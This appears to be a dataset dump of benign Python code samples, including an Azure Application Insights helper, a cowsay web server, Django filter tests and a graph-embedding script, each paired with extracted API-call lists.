code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from utilities import utilities
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.applicationinsights.models import (
ApplicationInsightsComponent
)
def create_or_update(resource_name, resource_group_name, location, tags, spec):
credentials, subscription_id = utilities.get_credentials()
resource_mangemnt_client = ResourceManagementClient(
credentials,
subscription_id
)
appinsights_client = ApplicationInsightsManagementClient(
credentials,
subscription_id
)
resource_group_params = {'location': location}
resource_mangemnt_client.resource_groups.create_or_update(
resource_group_name,
resource_group_params
)
resource = appinsights_client.components.create_or_update(
resource_group_name,
resource_name,
ApplicationInsightsComponent(
location=location,
tags=tags,
**spec
)
)
return (
resource.id,
resource.instrumentation_key
)
def delete(resource_group_name, resource_name):
credentials, subscription_id = utilities.get_credentials()
appinsights_client = ApplicationInsightsManagementClient(
credentials,
subscription_id
)
appinsights_client.components.delete(resource_group_name, resource_name)
| [
"azure.mgmt.applicationinsights.models.ApplicationInsightsComponent",
"azure.mgmt.applicationinsights.ApplicationInsightsManagementClient",
"utilities.utilities.get_credentials",
"azure.mgmt.resource.ResourceManagementClient"
] | [((373, 400), 'utilities.utilities.get_credentials', 'utilities.get_credentials', ([], {}), '()\n', (398, 400), False, 'from utilities import utilities\n'), ((433, 487), 'azure.mgmt.resource.ResourceManagementClient', 'ResourceManagementClient', (['credentials', 'subscription_id'], {}), '(credentials, subscription_id)\n', (457, 487), False, 'from azure.mgmt.resource import ResourceManagementClient\n'), ((536, 601), 'azure.mgmt.applicationinsights.ApplicationInsightsManagementClient', 'ApplicationInsightsManagementClient', (['credentials', 'subscription_id'], {}), '(credentials, subscription_id)\n', (571, 601), False, 'from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient\n'), ((1211, 1238), 'utilities.utilities.get_credentials', 'utilities.get_credentials', ([], {}), '()\n', (1236, 1238), False, 'from utilities import utilities\n'), ((1265, 1330), 'azure.mgmt.applicationinsights.ApplicationInsightsManagementClient', 'ApplicationInsightsManagementClient', (['credentials', 'subscription_id'], {}), '(credentials, subscription_id)\n', (1300, 1330), False, 'from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient\n'), ((928, 994), 'azure.mgmt.applicationinsights.models.ApplicationInsightsComponent', 'ApplicationInsightsComponent', ([], {'location': 'location', 'tags': 'tags'}), '(location=location, tags=tags, **spec)\n', (956, 994), False, 'from azure.mgmt.applicationinsights.models import ApplicationInsightsComponent\n')] |
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
import os
from textwrap import dedent
from cowpy import cow
import json
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
""" sets a status code, sets headers, sets body, and ends headers
"""
raw_html = dedent('''
<html>
<head>
<title> cowsay </title>
</head>
<body>
<header>
<nav>
<ul>
<li><a href="/cow">cowsay</a></li>
</ul>
</nav>
<header>
<main>
<!-- project description defining how users can further interact with the application -->
</main>
</body>
</html>''')
parsed_path = urlparse(self.path)
parsed_qs = parse_qs(parsed_path.query)
if parsed_path.path == '/':
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(raw_html.encode())
return
elif parsed_path.path == '/cow':
try:
parsed_message = parsed_qs['msg'][0]
bunny = cow.Bunny()
msg = bunny.milk(parsed_message)
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(msg.encode())
return
except KeyError:
self.send_response(400)
self.end_headers()
dragon = cow.DragonAndCow()
msg = dragon.milk('400 Bad Request')
self.wfile.write(msg.encode())
else:
self.send_response(404)
self.end_headers()
dragon = cow.DragonAndCow()
msg = dragon.milk('404 Not Found')
self.wfile.write(msg.encode())
self.send_response(404)
self.end_headers()
def do_POST(self):
""" Posts to the server
"""
parsed_path = urlparse(self.path)
parsed_qs = parse_qs(parsed_path.query)
if parsed_path.path == '/cow':
try:
parsed_message = parsed_qs['msg'][0]
bunny = cow.Bunny()
msg = bunny.milk(parsed_message)
json_message = json.dumps({'content': msg})
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(json_message.encode())
return
except KeyError:
self.send_response(400)
self.end_headers()
dragon = cow.DragonAndCow()
msg = dragon.milk('400 Bad Request')
self.wfile.write(msg.encode())
else:
self.send_response(404)
self.end_headers()
dragon = cow.DragonAndCow()
msg = dragon.milk('404 Not Found')
self.wfile.write(msg.encode())
def create_server():
""" creates the server instance
"""
return HTTPServer(
('127.0.0.1', int(os.environ['PORT'])),
SimpleHTTPRequestHandler
)
def run_forever():
""" Runs the server
"""
server = create_server()
try:
print(f'Server running on {os.environ["PORT"]}')
server.serve_forever()
except KeyboardInterrupt:
server.shutdown()
server.server_close()
if __name__ == '__main__':
run_forever()
| [
"textwrap.dedent",
"cowpy.cow.Bunny",
"urllib.parse.urlparse",
"cowpy.cow.DragonAndCow",
"json.dumps",
"urllib.parse.parse_qs"
] | [((361, 844), 'textwrap.dedent', 'dedent', (['"""\n <html>\n <head>\n <title> cowsay </title>\n </head>\n <body>\n <header>\n <nav>\n <ul>\n <li><a href="/cow">cowsay</a></li>\n </ul>\n </nav>\n <header>\n <main>\n <!-- project description defining how users can further interact with the application -->\n </main>\n </body>\n </html>"""'], {}), '(\n """\n <html>\n <head>\n <title> cowsay </title>\n </head>\n <body>\n <header>\n <nav>\n <ul>\n <li><a href="/cow">cowsay</a></li>\n </ul>\n </nav>\n <header>\n <main>\n <!-- project description defining how users can further interact with the application -->\n </main>\n </body>\n </html>"""\n )\n', (367, 844), False, 'from textwrap import dedent\n'), ((857, 876), 'urllib.parse.urlparse', 'urlparse', (['self.path'], {}), '(self.path)\n', (865, 876), False, 'from urllib.parse import urlparse, parse_qs\n'), ((897, 924), 'urllib.parse.parse_qs', 'parse_qs', (['parsed_path.query'], {}), '(parsed_path.query)\n', (905, 924), False, 'from urllib.parse import urlparse, parse_qs\n'), ((2168, 2187), 'urllib.parse.urlparse', 'urlparse', (['self.path'], {}), '(self.path)\n', (2176, 2187), False, 'from urllib.parse import urlparse, parse_qs\n'), ((2208, 2235), 'urllib.parse.parse_qs', 'parse_qs', (['parsed_path.query'], {}), '(parsed_path.query)\n', (2216, 2235), False, 'from urllib.parse import urlparse, parse_qs\n'), ((3065, 3083), 'cowpy.cow.DragonAndCow', 'cow.DragonAndCow', ([], {}), '()\n', (3081, 3083), False, 'from cowpy import cow\n'), ((1909, 1927), 'cowpy.cow.DragonAndCow', 'cow.DragonAndCow', ([], {}), '()\n', (1925, 1927), False, 'from cowpy import cow\n'), ((2370, 2381), 'cowpy.cow.Bunny', 'cow.Bunny', ([], {}), '()\n', (2379, 2381), False, 'from cowpy import cow\n'), ((2462, 2490), 'json.dumps', 'json.dumps', (["{'content': msg}"], {}), "({'content': msg})\n", (2472, 2490), False, 'import json\n'), ((1290, 1301), 'cowpy.cow.Bunny', 'cow.Bunny', ([], {}), '()\n', (1299, 1301), False, 'from cowpy import cow\n'), ((2844, 2862), 'cowpy.cow.DragonAndCow', 'cow.DragonAndCow', ([], {}), '()\n', (2860, 2862), False, 'from cowpy import cow\n'), ((1688, 1706), 'cowpy.cow.DragonAndCow', 'cow.DragonAndCow', ([], {}), '()\n', (1704, 1706), False, 'from cowpy import cow\n')] |
# coding=utf-8
"""List filter test cases."""
import pytest
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase, override_settings
from django.urls import reverse
from acme.core.models import Customer
from acme.tests import new_user
from model_filters.constants import FILTER_PARAMETER_NAME
from model_filters.models import FieldFilter, ModelFilter
@pytest.mark.e2e
@pytest.mark.filter
class Tests(TestCase):
"""List filter tests."""
def test_filtering_model_filter(self):
"""List filter on a ModelAdmin should work."""
owner = new_user(is_staff=True, is_superuser=True)
self.client.force_login(owner)
customer1 = Customer.objects.create(
name="<NAME>", membership=Customer.MEMBERSHIP_PLATINUM
)
customer2 = Customer.objects.create(
name="<NAME>", membership=Customer.MEMBERSHIP_GOLD
)
content_type = ContentType.objects.get_for_model(Customer)
model_filter = ModelFilter.objects.create(
name="Test Filter", content_type=content_type, owner=owner
)
field_filter = FieldFilter.objects.create(
model_filter=model_filter,
field="name",
operator="exact",
value="<NAME>",
)
# Naked list.
list_url = reverse(
f"admin:{content_type.app_label}_{content_type.model}_changelist"
)
response = self.client.get(list_url)
self.assertEqual(200, response.status_code)
self.assertEqual(list_url, f"{response.request['PATH_INFO']}")
self.assertEqual(response.context["cl"].result_count, 2)
self.assertEqual(response.context["cl"].result_list[0], customer2)
self.assertEqual(response.context["cl"].result_list[1], customer1)
# Model filter applied.
filter_url = f"{list_url}?{FILTER_PARAMETER_NAME}={model_filter.id}"
# These will match the customer name.
operators = ["", "iexact", "regex", "iregex", "contains", "icontains"]
for operator in operators:
if operator:
field_filter.operator = operator
field_filter.save()
response = self.client.get(filter_url)
self.assertEqual(200, response.status_code)
self.assertEqual(
filter_url,
f"{response.request['PATH_INFO']}?{response.request['QUERY_STRING']}",
)
self.assertEqual(response.context["cl"].result_count, 1)
# These will not match the customer name.
operators = ["isnull", "isempty"]
for operator in operators:
field_filter.operator = operator
field_filter.save()
response = self.client.get(filter_url)
self.assertEqual(200, response.status_code)
self.assertEqual(
filter_url,
f"{response.request['PATH_INFO']}?{response.request['QUERY_STRING']}",
)
self.assertEqual(response.context["cl"].result_count, 0)
# Missing filter shows naked list.
filter_url = f"{list_url}?{FILTER_PARAMETER_NAME}=1000"
response = self.client.get(filter_url)
self.assertEqual(200, response.status_code)
self.assertEqual(response.context["cl"].result_count, 2)
self.assertEqual(response.context["cl"].result_list[0], customer2)
self.assertEqual(response.context["cl"].result_list[1], customer1)
def test_filter_menu_display(self):
"""Filter menu should show list of model filters."""
owner1 = new_user(is_staff=True)
owner2 = new_user(is_staff=True)
content_type = ContentType.objects.get_for_model(Customer)
permission = Permission.objects.get(
content_type=content_type,
codename="view_customer",
)
owner1.user_permissions.add(permission)
owner2.user_permissions.add(permission)
ModelFilter.objects.create(
name="Test Filter 1", content_type=content_type, owner=owner1
)
model_filter_2 = ModelFilter.objects.create(
name="Test Filter 2", content_type=content_type, owner=owner2
)
self.client.force_login(owner1)
# Only the owners model filters should be in the response.
list_url = reverse(
f"admin:{content_type.app_label}_{content_type.model}_changelist"
)
response = self.client.get(list_url)
self.assertContains(response, "Test Filter 1")
self.assertNotContains(response, "Test Filter 2")
# Override setting so all staff can see permissible filters.
with override_settings(MODEL_FILTERS_VIEW_OWNER_ONLY=False):
# Add class permissions.
permission = Permission.objects.get(
content_type=ContentType.objects.get_for_model(ModelFilter),
codename="view_modelfilter",
)
owner1.user_permissions.add(permission)
# The other user's model filters should be in the response with a *.
response = self.client.get(
f"{list_url}?{FILTER_PARAMETER_NAME}={model_filter_2.id}"
)
self.assertContains(response, "Test Filter 1")
self.assertContains(response, "Test Filter 2 *")
self.assertNotContains(response, "Edit Filter")
self.assertEqual(response.context["choices"][0]["display"], "All")
self.assertEqual(response.context["choices"][1]["display"], "Test Filter 1")
self.assertEqual(
response.context["choices"][2]["display"], "Test Filter 2 *"
)
# Let other staff change model filters.
with override_settings(MODEL_FILTERS_CHANGE_OWNER_ONLY=False):
# Still blocked since no "change" permissions.
response = self.client.get(
f"{list_url}?{FILTER_PARAMETER_NAME}={model_filter_2.id}"
)
self.assertNotContains(response, "Edit Filter")
# Add change permissions.
permission = Permission.objects.get(
content_type=ContentType.objects.get_for_model(ModelFilter),
codename="change_modelfilter",
)
owner1.user_permissions.add(permission)
# Can now see the edit filter link.
response = self.client.get(
f"{list_url}?{FILTER_PARAMETER_NAME}={model_filter_2.id}"
)
self.assertContains(response, "Edit Filter")
# Override the default ordering.
with override_settings(MODEL_FILTERS_ORDER_BY="-created"):
response = self.client.get(list_url)
self.assertContains(response, "Test Filter 1")
self.assertContains(response, "Test Filter 2 *")
self.assertEqual(response.context["choices"][0]["display"], "All")
self.assertEqual(
response.context["choices"][1]["display"], "Test Filter 2 *"
)
self.assertEqual(
response.context["choices"][2]["display"], "Test Filter 1"
)
| [
"model_filters.models.FieldFilter.objects.create",
"django.contrib.auth.models.Permission.objects.get",
"django.contrib.contenttypes.models.ContentType.objects.get_for_model",
"acme.core.models.Customer.objects.create",
"django.test.override_settings",
"django.urls.reverse",
"model_filters.models.ModelF... | [((647, 689), 'acme.tests.new_user', 'new_user', ([], {'is_staff': '(True)', 'is_superuser': '(True)'}), '(is_staff=True, is_superuser=True)\n', (655, 689), False, 'from acme.tests import new_user\n'), ((749, 828), 'acme.core.models.Customer.objects.create', 'Customer.objects.create', ([], {'name': '"""<NAME>"""', 'membership': 'Customer.MEMBERSHIP_PLATINUM'}), "(name='<NAME>', membership=Customer.MEMBERSHIP_PLATINUM)\n", (772, 828), False, 'from acme.core.models import Customer\n'), ((871, 946), 'acme.core.models.Customer.objects.create', 'Customer.objects.create', ([], {'name': '"""<NAME>"""', 'membership': 'Customer.MEMBERSHIP_GOLD'}), "(name='<NAME>', membership=Customer.MEMBERSHIP_GOLD)\n", (894, 946), False, 'from acme.core.models import Customer\n'), ((992, 1035), 'django.contrib.contenttypes.models.ContentType.objects.get_for_model', 'ContentType.objects.get_for_model', (['Customer'], {}), '(Customer)\n', (1025, 1035), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((1059, 1149), 'model_filters.models.ModelFilter.objects.create', 'ModelFilter.objects.create', ([], {'name': '"""Test Filter"""', 'content_type': 'content_type', 'owner': 'owner'}), "(name='Test Filter', content_type=content_type,\n owner=owner)\n", (1085, 1149), False, 'from model_filters.models import FieldFilter, ModelFilter\n'), ((1191, 1296), 'model_filters.models.FieldFilter.objects.create', 'FieldFilter.objects.create', ([], {'model_filter': 'model_filter', 'field': '"""name"""', 'operator': '"""exact"""', 'value': '"""<NAME>"""'}), "(model_filter=model_filter, field='name',\n operator='exact', value='<NAME>')\n", (1217, 1296), False, 'from model_filters.models import FieldFilter, ModelFilter\n'), ((1394, 1468), 'django.urls.reverse', 'reverse', (['f"""admin:{content_type.app_label}_{content_type.model}_changelist"""'], {}), "(f'admin:{content_type.app_label}_{content_type.model}_changelist')\n", (1401, 1468), False, 'from django.urls import reverse\n'), ((3671, 3694), 'acme.tests.new_user', 'new_user', ([], {'is_staff': '(True)'}), '(is_staff=True)\n', (3679, 3694), False, 'from acme.tests import new_user\n'), ((3712, 3735), 'acme.tests.new_user', 'new_user', ([], {'is_staff': '(True)'}), '(is_staff=True)\n', (3720, 3735), False, 'from acme.tests import new_user\n'), ((3759, 3802), 'django.contrib.contenttypes.models.ContentType.objects.get_for_model', 'ContentType.objects.get_for_model', (['Customer'], {}), '(Customer)\n', (3792, 3802), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((3824, 3899), 'django.contrib.auth.models.Permission.objects.get', 'Permission.objects.get', ([], {'content_type': 'content_type', 'codename': '"""view_customer"""'}), "(content_type=content_type, codename='view_customer')\n", (3846, 3899), False, 'from django.contrib.auth.models import Permission\n'), ((4039, 4132), 'model_filters.models.ModelFilter.objects.create', 'ModelFilter.objects.create', ([], {'name': '"""Test Filter 1"""', 'content_type': 'content_type', 'owner': 'owner1'}), "(name='Test Filter 1', content_type=content_type,\n owner=owner1)\n", (4065, 4132), False, 'from model_filters.models import FieldFilter, ModelFilter\n'), ((4176, 4269), 'model_filters.models.ModelFilter.objects.create', 'ModelFilter.objects.create', ([], {'name': '"""Test Filter 2"""', 'content_type': 'content_type', 'owner': 'owner2'}), "(name='Test Filter 2', content_type=content_type,\n owner=owner2)\n", (4202, 4269), False, 'from model_filters.models import FieldFilter, ModelFilter\n'), ((4415, 4489), 'django.urls.reverse', 'reverse', (['f"""admin:{content_type.app_label}_{content_type.model}_changelist"""'], {}), "(f'admin:{content_type.app_label}_{content_type.model}_changelist')\n", (4422, 4489), False, 'from django.urls import reverse\n'), ((4753, 4807), 'django.test.override_settings', 'override_settings', ([], {'MODEL_FILTERS_VIEW_OWNER_ONLY': '(False)'}), '(MODEL_FILTERS_VIEW_OWNER_ONLY=False)\n', (4770, 4807), False, 'from django.test import TestCase, override_settings\n'), ((5832, 5888), 'django.test.override_settings', 'override_settings', ([], {'MODEL_FILTERS_CHANGE_OWNER_ONLY': '(False)'}), '(MODEL_FILTERS_CHANGE_OWNER_ONLY=False)\n', (5849, 5888), False, 'from django.test import TestCase, override_settings\n'), ((6776, 6828), 'django.test.override_settings', 'override_settings', ([], {'MODEL_FILTERS_ORDER_BY': '"""-created"""'}), "(MODEL_FILTERS_ORDER_BY='-created')\n", (6793, 6828), False, 'from django.test import TestCase, override_settings\n'), ((4924, 4970), 'django.contrib.contenttypes.models.ContentType.objects.get_for_model', 'ContentType.objects.get_for_model', (['ModelFilter'], {}), '(ModelFilter)\n', (4957, 4970), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((6286, 6332), 'django.contrib.contenttypes.models.ContentType.objects.get_for_model', 'ContentType.objects.get_for_model', (['ModelFilter'], {}), '(ModelFilter)\n', (6319, 6332), False, 'from django.contrib.contenttypes.models import ContentType\n')] |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import random
import psutil
import logging
import pandas as pd
import numpy as np
from io import open
from collections import Counter
from multiprocessing import cpu_count
from concurrent.futures import ProcessPoolExecutor
from scipy.sparse import csr_matrix, save_npz, load_npz, lil_matrix
from argparse import ArgumentParser, FileType, ArgumentDefaultsHelpFormatter
from gensim.models import Word2Vec
from gensim.models.word2vec import LineSentence
from six import text_type as unicode
from six import iteritems
from six.moves import range
from fastGraph.graph import Graph
from fastGraph import ngram
import pdb
p = psutil.Process(os.getpid())
try:
p.cpu_affinity(list(range(cpu_count())))
except AttributeError:
pass
LOGFORMAT = "%(asctime).19s %(levelname)s %(filename)s Line %(lineno)s: %(message)s"
logging.basicConfig(format=LOGFORMAT)
logger = logging.getLogger("fastGraph")
logger.setLevel(logging.INFO)
DTYPE = np.float64
def debug(type_, value, tb):
if hasattr(sys, 'ps1') or not sys.stderr.isatty():
sys.__excepthook__(type_, value, tb)
else:
import traceback
import pdb
traceback.print_exception(type_, value, tb)
print(u"\n")
pdb.pm()
def load_matrix(args):
logger.info("Reading from "+str(args.input))
if "wiki-Vote.csv" in args.input:
df = pd.read_csv(args.input, sep=',', comment='#')
max_node = max(max(df['FromNodeId'].unique()), max(df['ToNodeId'].unique()))
total_len = max_node + 1
matrix = lil_matrix(np.zeros((total_len, total_len), dtype=DTYPE))
for row in df.itertuples():
matrix[row.FromNodeId, row.ToNodeId] = matrix[row.FromNodeId, row.ToNodeId] + 1 # Each edge is binary
return csr_matrix(matrix)
elif "weighted_directed.csv" in args.input:
df = pd.read_csv(args.input, sep=',', comment='#')
max_node = max(max(df['SOURCE'].unique()), max(df['TARGET'].unique()))
total_len = max_node + 1
matrix = lil_matrix(np.zeros((total_len, total_len), dtype=DTYPE))
for row in df.itertuples():
matrix[row.SOURCE, row.TARGET] = matrix[row.SOURCE, row.TARGET] + row.RATING # Each edge has different weights
return csr_matrix(matrix)
elif ".npz" in args.input or ".npy" in args.input:
logger.info("Load matrix directly")
matrix = np.load(args.input)
return csr_matrix(matrix)
else:
# Implement parsing here to transform into matrix form.
raise NotImplementedError("Implement customized parsing here.")
def fastGraph_flow(args):
# Read and process different input
matrix = load_matrix(args)
logger.info("Matrix loaded.")
graph = Graph()
graph.build_graph_from_matrix(matrix, is_directed=True, remove_self_loops=False,
normalized_edge=True, outward_prob_check=True)
# Generate walks, select which walk to use by de-comment
if args.walk_type == "likely":
# walks = graph.build_likely_walk_corpus_multiprocess(args.number_paths, args.path_length,
# rand=random.Random(0), shuffle=True, deduplicate=False)
walks = graph.build_likely_walk_corpus(args.number_paths, args.path_length, rand=random.Random(0),
shuffle=True, deduplicate=False)
elif args.walk_type == "node2vec":
graph.preprocess_node2vec_walk(args.p, args.q)
walks = graph.build_node2vec_walk_corpus(args.number_paths, args.path_length, rand=random.Random(0),
shuffle=True, deduplicate=False)
elif args.walk_type == "deep":
walks = graph.build_deepwalk_corpus(args.number_paths, args.path_length, rand=random.Random(0),
shuffle=True, deduplicate=False)
else:
raise ValueError("--walk-type must be either 'likely', 'node2vec' or 'deep'.")
# Save walks to storage, enabling gensim's iterator ability.
walks_file = ''.join(str(args.input).split('.')[:-1])+'.walks'
with open(walks_file, 'w') as fout:
for walk in walks:
fout.write(' '.join(walk)+'\n')
logger.info("Walks saved to "+walks_file)
walks = LineSentence(args.input)
# Phrases
if args.ngram > 1:
logger.info("Building n-gram with n="+str(args.ngram)+"...")
walks, ngram_phrasers = ngram.build_ngram(walks, args.ngram)
# Word2Vec
logger.info("Training ...")
w2v = Word2Vec(walks, size=args.embed_size, window=args.window_size, min_count=0,
sg=1, hs=0, negative=10, workers=args.workers)
# Save model
w2v.save(args.output)
def main():
parser = ArgumentParser("fastGraph", formatter_class=ArgumentDefaultsHelpFormatter, conflict_handler='resolve')
parser.add_argument("-l", "--log", dest="log", default="INFO",
help="log verbosity level")
parser.add_argument('--input', nargs='?', required=True,
help='Input matrix')
parser.add_argument('--max-memory-data-size', default=1000000000, type=int,
help='Size to start dumping walks to disk, instead of keeping them in memory.')
parser.add_argument('--number-paths', default=5, type=int,
help='Number of random walks to start at each node')
parser.add_argument('--output', required=True,
help='Output representation file')
parser.add_argument('--embed-size', default=64, type=int,
help='Dimension of the latent vector as embedding.')
parser.add_argument('--seed', default=0, type=int,
help='Seed for random walk generator.')
parser.add_argument('--directed', default=True, type=bool,
help='Treat the graph as directed.')
parser.add_argument('--path-length', default=40, type=int,
help='Length of the random walk started at each node')
parser.add_argument('--window-size', default=5, type=int,
help='Window size of skipgram model.')
parser.add_argument('--walk-type', default="likely", type=str,
help='Which walk method to use: likely, random, node2vec.')
parser.add_argument('--p', default=5, type=int,
help="p value, refer to original paper: https://cs.stanford.edu/~jure/pubs/node2vec-kdd16.pdf ")
parser.add_argument('--q', default=3, type=int,
help="q value, refer to original paper: https://cs.stanford.edu/~jure/pubs/node2vec-kdd16.pdf ")
parser.add_argument('--workers', default=cpu_count(), type=int,
help='Number of parallel processes.')
parser.add_argument('--ngram', default=1, type=int,
help='N of n-grams, e.g.: set 2 for bigrams, 3 for trigrams, etc.')
args = parser.parse_args()
numeric_level = getattr(logging, args.log.upper(), None)
logging.basicConfig(format=LOGFORMAT)
logger.setLevel(numeric_level)
fastGraph_flow(args)
if __name__ == "__main":
sys.exit(main()) | [
"logging.getLogger",
"pdb.pm",
"pandas.read_csv",
"io.open",
"sys.stderr.isatty",
"multiprocessing.cpu_count",
"sys.__excepthook__",
"argparse.ArgumentParser",
"fastGraph.ngram.build_ngram",
"random.Random",
"fastGraph.graph.Graph",
"traceback.print_exception",
"gensim.models.Word2Vec",
"g... | [((882, 919), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': 'LOGFORMAT'}), '(format=LOGFORMAT)\n', (901, 919), False, 'import logging\n'), ((930, 960), 'logging.getLogger', 'logging.getLogger', (['"""fastGraph"""'], {}), "('fastGraph')\n", (947, 960), False, 'import logging\n'), ((706, 717), 'os.getpid', 'os.getpid', ([], {}), '()\n', (715, 717), False, 'import os\n'), ((2590, 2597), 'fastGraph.graph.Graph', 'Graph', ([], {}), '()\n', (2595, 2597), False, 'from fastGraph.graph import Graph\n'), ((3895, 3919), 'gensim.models.word2vec.LineSentence', 'LineSentence', (['args.input'], {}), '(args.input)\n', (3907, 3919), False, 'from gensim.models.word2vec import LineSentence\n'), ((4127, 4253), 'gensim.models.Word2Vec', 'Word2Vec', (['walks'], {'size': 'args.embed_size', 'window': 'args.window_size', 'min_count': '(0)', 'sg': '(1)', 'hs': '(0)', 'negative': '(10)', 'workers': 'args.workers'}), '(walks, size=args.embed_size, window=args.window_size, min_count=0,\n sg=1, hs=0, negative=10, workers=args.workers)\n', (4135, 4253), False, 'from gensim.models import Word2Vec\n'), ((4318, 4424), 'argparse.ArgumentParser', 'ArgumentParser', (['"""fastGraph"""'], {'formatter_class': 'ArgumentDefaultsHelpFormatter', 'conflict_handler': '"""resolve"""'}), "('fastGraph', formatter_class=ArgumentDefaultsHelpFormatter,\n conflict_handler='resolve')\n", (4332, 4424), False, 'from argparse import ArgumentParser, FileType, ArgumentDefaultsHelpFormatter\n'), ((6293, 6330), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': 'LOGFORMAT'}), '(format=LOGFORMAT)\n', (6312, 6330), False, 'import logging\n'), ((1095, 1131), 'sys.__excepthook__', 'sys.__excepthook__', (['type_', 'value', 'tb'], {}), '(type_, value, tb)\n', (1113, 1131), False, 'import sys\n'), ((1173, 1216), 'traceback.print_exception', 'traceback.print_exception', (['type_', 'value', 'tb'], {}), '(type_, value, tb)\n', (1198, 1216), False, 'import traceback\n'), ((1234, 1242), 'pdb.pm', 'pdb.pm', ([], {}), '()\n', (1240, 1242), False, 'import pdb\n'), ((1355, 1400), 'pandas.read_csv', 'pd.read_csv', (['args.input'], {'sep': '""","""', 'comment': '"""#"""'}), "(args.input, sep=',', comment='#')\n", (1366, 1400), True, 'import pandas as pd\n'), ((1720, 1738), 'scipy.sparse.csr_matrix', 'csr_matrix', (['matrix'], {}), '(matrix)\n', (1730, 1738), False, 'from scipy.sparse import csr_matrix, save_npz, load_npz, lil_matrix\n'), ((3756, 3777), 'io.open', 'open', (['walks_file', '"""w"""'], {}), "(walks_file, 'w')\n", (3760, 3777), False, 'from io import open\n'), ((4041, 4077), 'fastGraph.ngram.build_ngram', 'ngram.build_ngram', (['walks', 'args.ngram'], {}), '(walks, args.ngram)\n', (4058, 4077), False, 'from fastGraph import ngram\n'), ((1072, 1091), 'sys.stderr.isatty', 'sys.stderr.isatty', ([], {}), '()\n', (1089, 1091), False, 'import sys\n'), ((1529, 1574), 'numpy.zeros', 'np.zeros', (['(total_len, total_len)'], {'dtype': 'DTYPE'}), '((total_len, total_len), dtype=DTYPE)\n', (1537, 1574), True, 'import numpy as np\n'), ((1791, 1836), 'pandas.read_csv', 'pd.read_csv', (['args.input'], {'sep': '""","""', 'comment': '"""#"""'}), "(args.input, sep=',', comment='#')\n", (1802, 1836), True, 'import pandas as pd\n'), ((2159, 2177), 'scipy.sparse.csr_matrix', 'csr_matrix', (['matrix'], {}), '(matrix)\n', (2169, 2177), False, 'from scipy.sparse import csr_matrix, save_npz, load_npz, lil_matrix\n'), ((6009, 6020), 'multiprocessing.cpu_count', 'cpu_count', ([], {}), '()\n', (6018, 6020), False, 'from multiprocessing import cpu_count\n'), ((751, 762), 'multiprocessing.cpu_count', 'cpu_count', ([], {}), '()\n', (760, 762), False, 'from multiprocessing import cpu_count\n'), ((1959, 2004), 'numpy.zeros', 'np.zeros', (['(total_len, total_len)'], {'dtype': 'DTYPE'}), '((total_len, total_len), dtype=DTYPE)\n', (1967, 2004), True, 'import numpy as np\n'), ((2279, 2298), 'numpy.load', 'np.load', (['args.input'], {}), '(args.input)\n', (2286, 2298), True, 'import numpy as np\n'), ((2308, 2326), 'scipy.sparse.csr_matrix', 'csr_matrix', (['matrix'], {}), '(matrix)\n', (2318, 2326), False, 'from scipy.sparse import csr_matrix, save_npz, load_npz, lil_matrix\n'), ((3064, 3080), 'random.Random', 'random.Random', (['(0)'], {}), '(0)\n', (3077, 3080), False, 'import random\n'), ((3297, 3313), 'random.Random', 'random.Random', (['(0)'], {}), '(0)\n', (3310, 3313), False, 'import random\n'), ((3473, 3489), 'random.Random', 'random.Random', (['(0)'], {}), '(0)\n', (3486, 3489), False, 'import random\n')] |
from nose.tools import assert_equals, assert_true
from wikimetrics.metrics import metric_classes
from wikimetrics.models import SumAggregateByUserReport
from wikimetrics.models.storage.wikiuser import WikiUserKey
from wikimetrics.enums import Aggregation
from ..fixtures import DatabaseTest
class SumAggregateByUserReportWithoutQueueTest(DatabaseTest):
def setUp(self):
DatabaseTest.setUp(self)
self.common_cohort_1()
def test_finish_positive(self):
metric = metric_classes['RollingActiveEditor']()
report = SumAggregateByUserReport(self.cohort, metric)
report.usernames = {
WikiUserKey(1, 'enwiki', 12): 'John',
WikiUserKey(2, 'dewiki', 12): 'John',
WikiUserKey(3, 'frwiki', 12): 'John',
WikiUserKey(4, 'ptwiki', 12): 'Kate',
}
finished = report.finish([{
'1|enwiki|12': {'rolling_active_editor': 0},
'2|dewiki|12': {'rolling_active_editor': 1},
'3|frwiki|12': {'rolling_active_editor': 0},
'4|ptwiki|12': {'rolling_active_editor': 1},
}])
assert_equals(len(finished), 1)
assert_true(Aggregation.SUM in finished)
assert_true('rolling_active_editor' in finished[Aggregation.SUM])
assert_equals(finished[Aggregation.SUM]['rolling_active_editor'], 2)
def test_finish_negative(self):
metric = metric_classes['RollingActiveEditor']()
report = SumAggregateByUserReport(self.cohort, metric)
report.usernames = {
WikiUserKey(1, 'enwiki', 12): 'John',
WikiUserKey(2, 'dewiki', 12): 'John',
WikiUserKey(3, 'frwiki', 12): 'John',
WikiUserKey(4, 'ptwiki', 12): 'Kate',
}
finished = report.finish([{
'1|enwiki|12': {'rolling_active_editor': 0},
'2|dewiki|12': {'rolling_active_editor': 0},
'3|frwiki|12': {'rolling_active_editor': 0},
'4|ptwiki|12': {'rolling_active_editor': 0},
}])
assert_equals(len(finished), 1)
assert_true(Aggregation.SUM in finished)
assert_true('rolling_active_editor' in finished[Aggregation.SUM])
assert_equals(finished[Aggregation.SUM]['rolling_active_editor'], 0)
| [
"nose.tools.assert_true",
"wikimetrics.models.storage.wikiuser.WikiUserKey",
"wikimetrics.models.SumAggregateByUserReport",
"nose.tools.assert_equals"
